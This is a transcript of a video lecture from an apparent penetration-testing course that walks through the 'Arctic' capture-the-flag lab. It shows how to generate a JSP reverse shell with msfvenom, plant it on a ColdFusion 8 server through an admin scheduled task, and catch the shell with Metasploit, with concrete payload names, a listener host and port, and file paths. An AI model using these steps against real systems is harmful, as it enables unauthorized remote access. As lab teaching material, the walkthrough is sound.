1 00:00:00,570 --> 00:00:08,040 Hi, within this lecture, we're going to try and find a way in order to upload a shell or any kind
2 00:00:08,040 --> 00:00:16,950 of way to send a reverse shell back to our Kali Linux with inside of the ColdFusion administrator panel
3 00:00:16,950 --> 00:00:17,510 over here.
4 00:00:17,520 --> 00:00:26,780 OK, so I don't think that you ever used ColdFusion before, but if you did, then you can actually find
5 00:00:26,780 --> 00:00:27,860 this very easy.
6 00:00:28,230 --> 00:00:36,600 But when I first saw this CTF, I hadn't used any kind of ColdFusion products before, so I'm going
7 00:00:36,600 --> 00:00:39,300 to exactly show you how I found this out.
8 00:00:39,510 --> 00:00:46,710 OK, so first thing I did, I'm going to just open Google and I have written down "how to upload
9 00:00:46,710 --> 00:00:49,050 shell to ColdFusion".
10 00:00:49,080 --> 00:00:52,080 OK, so this is how easy it is.
11 00:00:52,080 --> 00:00:54,260 Or maybe we don't know yet.
12 00:00:54,630 --> 00:00:56,640 Maybe it's easy, maybe it's not.
13 00:00:56,640 --> 00:01:03,030 As you can see, we have one million results over here, more than one million actually, close to two
14 00:01:03,030 --> 00:01:03,510 million.
15 00:01:04,020 --> 00:01:11,270 And we can just try to read these tutorials over here in order to understand how this works.
16 00:01:11,400 --> 00:01:17,310 OK, because if you never worked with ColdFusion before, then you don't even know the menus.
17 00:01:17,310 --> 00:01:20,700 You don't even know the options.
18 00:01:20,880 --> 00:01:22,380 So you're going to have to cheat a little.
19 00:01:22,380 --> 00:01:32,270 But of course, you don't want to just open the, I don't know, the Arctic CTF solution like this.
20 00:01:32,280 --> 00:01:35,340 OK, so this is the Arctic write-up, for example.
21 00:01:35,340 --> 00:01:41,860 I have seen this when I first Googled it as well, but I haven't opened it because that would be cheating.
22 00:01:42,270 --> 00:01:46,290 OK, but you can actually read the other ones.
23 00:01:46,560 --> 00:01:50,790 Like over here we see that it's shell.jsp.
24 00:01:50,790 --> 00:01:55,770 So it should be in the JSP format most of the time, I believe.
25 00:01:56,310 --> 00:02:04,020 And let's see if we have to upload a file to ColdFusion and let's see if we can find something about
26 00:02:04,020 --> 00:02:04,470 this.
27 00:02:04,920 --> 00:02:09,330 OK, because we can create a JSP easily with msfvenom.
28 00:02:09,570 --> 00:02:17,760 So I'm just going to search for, like, that "how to download files from ColdFusion" and see if we can actually
29 00:02:17,760 --> 00:02:24,540 make a request, because ColdFusion is a web application development portal, some kind of software
30 00:02:24,540 --> 00:02:25,170 eventually.
31 00:02:25,170 --> 00:02:28,800 And there should be a way to download files.
32 00:02:29,220 --> 00:02:29,720 Right.
33 00:02:30,060 --> 00:02:33,620 So as you can see, we have the Stack Overflow over here.
34 00:02:34,080 --> 00:02:42,120 And yeah, I believe we can write some functions inside of the ColdFusion administrator panel over
35 00:02:42,120 --> 00:02:42,570 here.
36 00:02:43,440 --> 00:02:53,340 So maybe we can try to find this scheduled tasks as we see over there and try to see what it does.
37 00:02:53,380 --> 00:02:55,350 OK, let me go over here.
38 00:02:58,030 --> 00:03:01,430 And of course, we're going to have to wait a little bit, as usual.
39 00:03:01,750 --> 00:03:08,260 And by the way, it took me much more time to understand that we need to go into the scheduled tasks
40 00:03:08,590 --> 00:03:09,000 than
41 00:03:09,010 --> 00:03:10,490 did the research, OK?
42 00:03:10,510 --> 00:03:12,100 Took me a lot of Googling.
43 00:03:12,370 --> 00:03:19,240 But again, I have found out that if I come over here, I can create a scheduled task.
44 00:03:19,540 --> 00:03:27,210 And the scheduled task is exactly like a cron job that we do in Kali Linux or in Linux usually.
45 00:03:27,520 --> 00:03:35,200 And over here we can create a job, like I create a task, and we can assign a URL to it, apparently.
46 00:03:35,440 --> 00:03:43,690 OK, so if we can assign a URL, we can just download that file and save it to some kind of a file and
47 00:03:43,690 --> 00:03:47,100 folder system inside of the Adobe ColdFusion.
48 00:03:47,530 --> 00:03:52,540 And that would be great because we can just create a shell and upload it over here.
49 00:03:53,080 --> 00:04:00,500 OK, and there's one question in mind, though, how to run that after we save it.
50 00:04:00,970 --> 00:04:05,380 OK, we don't even know that we can write a URL here, OK?
51 00:04:05,410 --> 00:04:06,850 That's, that is very easy.
52 00:04:06,850 --> 00:04:15,190 We can just put it on our Apache web server, and how to actually save that file and run that file.
53 00:04:15,850 --> 00:04:23,470 OK, so it should be somewhere over here like CF slash files or something like that, but we don't
54 00:04:23,470 --> 00:04:23,920 know it.
55 00:04:24,490 --> 00:04:26,120 So how to find that file?
56 00:04:26,140 --> 00:04:29,350 It took me a lot of time to understand that too.
57 00:04:29,650 --> 00:04:32,340 You have to go to the server settings and mappings.
58 00:04:32,890 --> 00:04:38,980 So if you go to mappings, you can see some general information about your ColdFusion 8 administrator
59 00:04:38,990 --> 00:04:39,630 settings.
60 00:04:40,060 --> 00:04:42,220 OK, and let me show you what I mean.
61 00:04:42,490 --> 00:04:48,050 If you go to the mappings, you will see the logical paths over here.
62 00:04:48,670 --> 00:04:53,940 So these are the mappings that our ColdFusion server uses.
63 00:04:54,190 --> 00:05:02,680 So our directory path is something like this: C:\ColdFusion8\wwwroot\CFIDE.
64 00:05:02,890 --> 00:05:09,610 OK, so of course there is no way of knowing that; you have to look at it from the mappings so that you
65 00:05:09,610 --> 00:05:11,710 can come to the scheduled tasks.
66 00:05:11,890 --> 00:05:20,050 When you create a scheduled task, you can just put that root into your file target and then make it
67 00:05:20,050 --> 00:05:20,460 work.
68 00:05:21,220 --> 00:05:22,660 So I'm going to show you how to do that.
69 00:05:22,660 --> 00:05:29,080 But just let me search for JSP reverse shell, by the way, to see if we can get a reverse shell back
70 00:05:29,080 --> 00:05:35,800 from PentestMonkey or something like that from GitHub, or we're going to have to create it
71 00:05:35,800 --> 00:05:36,960 with msfvenom.
72 00:05:37,390 --> 00:05:39,260 So let me see.
73 00:05:40,180 --> 00:05:44,910 So this is the reverse JSP and I don't know.
74 00:05:44,920 --> 00:05:46,570 Yeah, it's a backdoor, actually.
75 00:05:46,580 --> 00:05:55,480 Maybe we can try to compile this on our own or just submit it to download it from the ColdFusion and
76 00:05:55,480 --> 00:05:58,990 just make it run and get back to us.
77 00:05:59,530 --> 00:06:04,440 Or maybe we can try to do this automatically with msfvenom.
78 00:06:04,660 --> 00:06:11,520 Let me see if we have a Meterpreter session or, like, a msfvenom JSP reverse shell.
79 00:06:11,800 --> 00:06:17,290 I don't think we can get a Meterpreter out of this one, but at least we can get a shell back.
80 00:06:17,290 --> 00:06:17,690 Right.
81 00:06:18,370 --> 00:06:20,760 So let me come over here.
82 00:06:21,400 --> 00:06:21,850 Yeah.
83 00:06:22,730 --> 00:06:23,180 Yep.
84 00:06:23,290 --> 00:06:23,740 Here you go.
85 00:06:23,740 --> 00:06:26,770 We have JSP, Java Meterpreter reverse
86 00:06:26,770 --> 00:06:28,540 TCP, we have a Meterpreter.
87 00:06:28,550 --> 00:06:34,270 Well, I don't think we're going to get a Meterpreter shell back, but it's worth a shot here.
88 00:06:34,270 --> 00:06:41,950 You see the command in order to run this, OK, as you can see, can be found with a quick Googling.
89 00:06:42,250 --> 00:06:49,150 So all you gotta do is just specify the payload over here, which is java/jsp_shell_reverse_tcp.
90 00:06:49,540 --> 00:06:55,690 And of course, you're going to have to give the LHOST and LPORT and you're going to have to set the format to raw
91 00:06:56,020 --> 00:07:00,370 and call it into a file called shell.jsp.
92 00:07:00,790 --> 00:07:04,510 So it's the usual way of working with msfvenom.
93 00:07:04,510 --> 00:07:10,570 I'm going to run this, or you can just copy and paste it from Google or you can just follow
94 00:07:10,570 --> 00:07:11,440 along with me.
95 00:07:11,830 --> 00:07:15,610 I'm going to say msfvenom, the payload option
96 00:07:15,610 --> 00:07:23,950 over here is -p java/jsp_shell_reverse_tcp, and for the host, I'm going to go for
97 00:07:23,950 --> 00:07:24,830 10.10.14.19.
98 00:07:24,850 --> 00:07:26,740 Of course you're going to have to write your own.
99 00:07:27,070 --> 00:07:29,950 LPORT is 4444.
100 00:07:29,980 --> 00:07:31,300 It really doesn't matter.
101 00:07:31,660 --> 00:07:41,530 I'm going to want it in a raw format and I'm going to just save it under /var/www/html and of course
102 00:07:41,530 --> 00:07:44,290 you're going to have to give it a name like shell.jsp.
103 00:07:44,830 --> 00:07:48,850 OK, and don't forget to add the extension over here as well.
104 00:07:48,850 --> 00:07:51,040 Like .jsp, OK.
105 00:07:51,310 --> 00:07:56,680 You don't have to call it shell, you can call it anything you want, but make sure you
106 00:07:56,910 --> 00:08:05,290 put the .jsp at the end, so this will create a JSP shell for us, and now I'm going to run the service
107 00:08:05,290 --> 00:08:06,700 apache2 start thing.
108 00:08:06,730 --> 00:08:09,580 So, you know, to run my web server.
109 00:08:10,150 --> 00:08:12,310 Now I'm going to schedule a new task.
110 00:08:12,610 --> 00:08:16,170 Now I can reach that file through my web server.
111 00:08:16,180 --> 00:08:16,500 Right.
112 00:08:16,510 --> 00:08:24,520 So I'm going to specify the path, the URL as my web server, and also I'm going to specify the path
113 00:08:24,520 --> 00:08:28,100 of the file as the mapping that we have copied.
114 00:08:28,930 --> 00:08:31,330 So remember, we copied the mapping.
115 00:08:32,530 --> 00:08:41,380 OK, so I'm going to call this test and for the URL, I'm going to go for 10.10.14.19 and
116 00:08:41,380 --> 00:08:42,960 shell.jsp.
117 00:08:43,030 --> 00:08:44,470 So this is my web server.
118 00:08:44,500 --> 00:08:46,270 You're going to have to write your own IP.
119 00:08:46,510 --> 00:08:50,920 I don't require any username and password to reach for this.
120 00:08:51,370 --> 00:08:58,990 I'm going to save this to here, the path that we have copied from mappings.
121 00:08:59,230 --> 00:09:04,690 OK, so let me open this one more time because it seems that I've lost that.
122 00:09:05,650 --> 00:09:09,730 This is one of the reasons that we should take notes often.
123 00:09:09,730 --> 00:09:12,070 As you can see, I lost that.
124 00:09:12,550 --> 00:09:14,290 I have to put this one more time.
125 00:09:14,860 --> 00:09:21,290 So let's wait until 10 seconds so that we can copy it and just come over here and paste it.
126 00:09:21,760 --> 00:09:22,690 So here you go.
127 00:09:22,690 --> 00:09:24,440 It's going to be under here.
128 00:09:24,640 --> 00:09:31,780 So, of course, you don't have to take in the C, OK, because it's already in the local for this one.
129 00:09:31,780 --> 00:09:40,500 But since we do that, it can just come over here and save it under the C itself.
130 00:09:40,900 --> 00:09:46,890 And over here, I'm going to write the shell.jsp so that this file can be saved to here.
131 00:09:47,290 --> 00:09:54,340 So I'm going to submit this and I believe this will be executed for us.
132 00:09:54,340 --> 00:10:00,570 And we can see if we get the file or not by just running this.
133 00:10:00,940 --> 00:10:06,910 OK, if we can actually reach the JSP file, that means that we got the file.
134 00:10:07,990 --> 00:10:14,620 OK, but this is, maybe this is the first time that we are doing this on ColdFusion administrator
135 00:10:14,620 --> 00:10:15,070 panel.
136 00:10:15,080 --> 00:10:16,730 So we're going to try and see.
137 00:10:17,350 --> 00:10:24,610 So I'm going to open the msfconsole over here because I'm going to create a listener for us.
138 00:10:25,630 --> 00:10:26,500 So here you go.
139 00:10:26,500 --> 00:10:28,090 Our task is scheduled.
140 00:10:28,660 --> 00:10:35,620 So I don't think we have given some instructions for scheduling, like run every minute, runs every
141 00:10:35,620 --> 00:10:36,430 10 minutes.
142 00:10:36,730 --> 00:10:38,300 I'm going to see to that as well.
143 00:10:38,680 --> 00:10:41,440 So over here, I'm in the Metasploit.
144 00:10:41,830 --> 00:10:49,870 So what I want to do, what I want to do, I want to go into the multi/handler as usual, and over there
145 00:10:49,870 --> 00:10:52,750 we're going to have to set the payload to JSP.
146 00:10:52,750 --> 00:10:58,360 So let me try and use exploit/multi/handler, there, so I don't have any payload right now.
147 00:10:58,360 --> 00:11:06,480 So I'm going to say show payloads, but I believe it's going to show us a lot of payloads over here.
148 00:11:07,750 --> 00:11:11,500 So let me see if we have one with Meterpreter.
149 00:11:11,500 --> 00:11:12,690 I don't think so.
150 00:11:13,000 --> 00:11:23,020 So we're just going to use the same old Java JSP. But let me just try to see, because it said Meterpreter
151 00:11:23,800 --> 00:11:25,720 already there in the website.
152 00:11:25,990 --> 00:11:31,300 I don't think so, but let me just find it, so I don't see it.
153 00:11:32,050 --> 00:11:39,250 If you guys found a way to open a Meterpreter with that JSP payload, then it's very good.
154 00:11:39,730 --> 00:11:45,230 But I believe we're going to have to go for the university anyway after Java.
155 00:11:45,800 --> 00:11:50,320 OK, and let me just take a look around here.
156 00:11:50,320 --> 00:11:55,090 I really want to read this, so I'm going to search for Meterpreter
157 00:11:55,990 --> 00:12:02,020 Windows JSP shell, OK, msfconsole.
158 00:12:02,290 --> 00:12:14,350 So we're going to get a reverse shell back from the JSP file and see if we can make it into the Meterpreter
159 00:12:14,410 --> 00:12:15,240 or not.
160 00:12:16,330 --> 00:12:26,890 Nope, I don't think so, because even though it says that Meterpreter shell over here, OK, the payload
161 00:12:26,890 --> 00:12:30,250 is still java/jsp_shell_reverse_tcp.
162 00:12:30,610 --> 00:12:36,850 So I'm just going to go for that, OK, because let's not waste time over here.
163 00:12:36,880 --> 00:12:40,210 It doesn't matter if we get a Meterpreter shell back or not.
164 00:12:40,750 --> 00:12:44,230 I'm going to set payload to this and I'm going to run the show options.
165 00:12:44,500 --> 00:12:48,400 So we're going to have to change the host to 10.10.14.19.
166 00:12:48,700 --> 00:12:52,870 LPORT, I believe it has already been defined as 4444.
167 00:12:53,200 --> 00:12:56,350 So I can run this in the background by running exploit.
168 00:12:57,490 --> 00:13:05,140 And I'm going to come back here and let me see if we got the JSP file back, so I'm going to run shell.jsp
169 00:13:05,140 --> 00:13:08,700 over here, OK?
170 00:13:09,040 --> 00:13:10,780 And see if we can get this.
171 00:13:11,890 --> 00:13:19,630 And let's see, shell.jsp, of course, we're going to have to wait 10 seconds in order to make this work.
172 00:13:20,320 --> 00:13:27,210 And it will show us if we got that file, if we got that file, it will open the shell and here you go.
173 00:13:27,220 --> 00:13:28,540 I don't think so.
174 00:13:29,200 --> 00:13:30,610 We didn't get it yet.
175 00:13:31,210 --> 00:13:33,460 So we don't have a shell back here.
176 00:13:34,060 --> 00:13:36,790 So it says that file not found exception.
177 00:13:36,790 --> 00:13:41,980 OK, so maybe we're going to have to just take a look at this test one more time.
178 00:13:42,430 --> 00:13:50,680 Maybe we can just click on here, like run scheduled task, so that it can run it for us because we haven't
179 00:13:50,680 --> 00:13:52,750 specified an interval for this.
180 00:13:53,050 --> 00:13:56,470 Like in a crontab, you remember the crontab.
181 00:13:56,860 --> 00:14:02,320 So we have to specify some kind of time frame and we didn't do that over here.
182 00:14:02,320 --> 00:14:08,160 Maybe we're going to have to run this manually like that and see if it works or not.
183 00:14:08,680 --> 00:14:14,770 Of course, it will make us wait 10 seconds again before it shows us the results.
184 00:14:15,880 --> 00:14:18,630 So, yep, I believe, yeah.
185 00:14:18,640 --> 00:14:21,230 It says that task was completed successfully.
186 00:14:21,670 --> 00:14:23,440 Let's see if we can get this.
187 00:14:23,590 --> 00:14:25,900 OK, let's see if we got this right now.
188 00:14:25,900 --> 00:14:32,260 So CFIDE/shell.jsp, let me run this and let's see if we get the shell back.
189 00:14:33,100 --> 00:14:38,170 If it doesn't work, of course, we're going to have to just run the scheduled task one more time with
190 00:14:38,170 --> 00:14:39,180 a different setup.
191 00:14:40,660 --> 00:14:44,740 So, again, we're waiting 10 seconds and here you go.
192 00:14:44,740 --> 00:14:48,310 We got the file not found exception one more time.
193 00:14:48,880 --> 00:14:55,750 So I believe there are some things that we should consider about the scheduled task itself.
194 00:14:55,750 --> 00:15:00,490 So let me go into the test and we're going to change some parameters.
195 00:15:01,470 --> 00:15:02,550 Let me see.
196 00:15:03,920 --> 00:15:07,710 Of course, we're going to have to wait and see for 10 seconds one more time.
197 00:15:08,130 --> 00:15:10,760 Again, this is not how you do CTF.
198 00:15:11,370 --> 00:15:19,670 So I'm going to go into our html to see, yep, we have the shell.jsp and here you go.
199 00:15:19,680 --> 00:15:21,860 Let's see the thing over here.
200 00:15:21,870 --> 00:15:28,260 So we're saving it under the right folder and everything seems to be fine.
201 00:15:28,260 --> 00:15:29,580 It's saving in the right folder.
202 00:15:29,580 --> 00:15:30,240 Right name.
203 00:15:30,540 --> 00:15:35,130 So for the frequency we actually specified something without even realizing it.
204 00:15:35,140 --> 00:15:39,080 So it should be a one time thing at some point.
205 00:15:39,300 --> 00:15:42,990 So I'm going to make it daily every, maybe, one hour.
206 00:15:42,990 --> 00:15:43,710 One minute.
207 00:15:43,750 --> 00:15:50,490 OK, why not make it one minute and make sure, just save it, save output to a file as well.
208 00:15:50,850 --> 00:15:52,370 Maybe that was the problem.
209 00:15:52,620 --> 00:15:54,980 So I changed it to one minute.
210 00:15:55,020 --> 00:15:59,710 Daily every, and also I checked the save output file.
211 00:16:00,150 --> 00:16:04,650 OK, so maybe the frequency was the problem.
212 00:16:04,650 --> 00:16:09,310 Maybe saving this output file was the problem, we are going to see.
213 00:16:10,050 --> 00:16:10,470 Yup.
214 00:16:10,470 --> 00:16:13,560 It says that you need to enter a valid start time.
215 00:16:14,520 --> 00:16:21,690 OK, I'm going to choose this one more time, but I'm going to leave the save output to a file checked
216 00:16:22,230 --> 00:16:25,200 and we're going to see if that was the problem or not.
217 00:16:25,410 --> 00:16:28,680 OK, let's see if we can make it work.
218 00:16:29,490 --> 00:16:35,630 So if we can make it work, we can always run this from the administrator panel.
219 00:16:35,850 --> 00:16:43,200 I believe you know that play button that we have actually clicked on and it said that test completed
220 00:16:43,200 --> 00:16:44,030 successfully.
221 00:16:44,340 --> 00:16:44,850 Why not?
222 00:16:44,850 --> 00:16:45,450 We do that.
223 00:16:45,450 --> 00:16:47,180 We can just try to do that as well.
224 00:16:47,460 --> 00:16:47,930 Right.
225 00:16:48,240 --> 00:16:53,490 So I'm going to try that as long as we can submit this.
226 00:16:53,640 --> 00:16:54,530 Yeah, here you go.
227 00:16:54,780 --> 00:17:01,740 Now, I can run this by clicking on this play button and let's see if we can get back the shell this time.
228 00:17:02,340 --> 00:17:05,700 OK, we're going to have to wait ten seconds.
229 00:17:06,760 --> 00:17:12,140 And then we're going to have to run it from the browser one more time.
230 00:17:12,610 --> 00:17:13,500 And here you go.
231 00:17:13,510 --> 00:17:15,230 Let me just see.
232 00:17:15,260 --> 00:17:16,440 Yep, this is finished.
233 00:17:16,690 --> 00:17:21,910 I'm going to run this and we're going to have to wait 10 seconds to get a response back.
234 00:17:22,240 --> 00:17:30,820 And then if we get this, shell.jsp should open a reverse shell back to us, to the Kali machine
235 00:17:30,820 --> 00:17:31,460 over here.
236 00:17:32,080 --> 00:17:34,470 So let's wait until we see.
237 00:17:34,900 --> 00:17:35,500 Here you go.
238 00:17:35,530 --> 00:17:40,360 Now, we don't get an error; if we come over here to our listener,
239 00:17:40,390 --> 00:17:41,430 here you go.
240 00:17:41,800 --> 00:17:43,510 Now we have the shell open.
241 00:17:43,520 --> 00:17:52,000 So I'm going to run sessions, well, now here you see we have this one and I'm going to just interact
242 00:17:52,000 --> 00:17:52,450 with it.
243 00:17:53,110 --> 00:17:55,570 And let's see what kind of shell we get.
244 00:17:55,840 --> 00:17:57,400 It really doesn't matter.
245 00:17:57,970 --> 00:18:06,040 As long as we get a shell, we can try to escalate our privileges in a way that we can become an administrator
246 00:18:06,040 --> 00:18:10,180 user because we have seen a lot of things about it in the previous section.
247 00:18:10,210 --> 00:18:10,650 Right.
248 00:18:11,260 --> 00:18:16,380 So let me try this with hitting enter or something.
249 00:18:16,840 --> 00:18:17,590 Yeah, here you go.
250 00:18:17,590 --> 00:18:24,440 We have the shell back here, so I'm going to try to find whoami.
251 00:18:24,670 --> 00:18:26,830 Yeah, we are arctic\tolis.
252 00:18:27,460 --> 00:18:29,080 So far so good.
253 00:18:29,500 --> 00:18:32,290 I'm going to run systeminfo and let's see.
254 00:18:32,320 --> 00:18:33,100 Yeah, here you go.
255 00:18:33,100 --> 00:18:35,250 We see all the things over here.
256 00:18:35,260 --> 00:18:36,340 So this is Arctic.
257 00:18:36,340 --> 00:18:40,980 This is Windows Server, actually Windows Server 2008.
258 00:18:41,350 --> 00:18:42,070 Very good.
259 00:18:42,460 --> 00:18:43,510 Let's stop here.
260 00:18:43,510 --> 00:18:47,950 And within the next lecture, we can understand how to escalate our privileges together.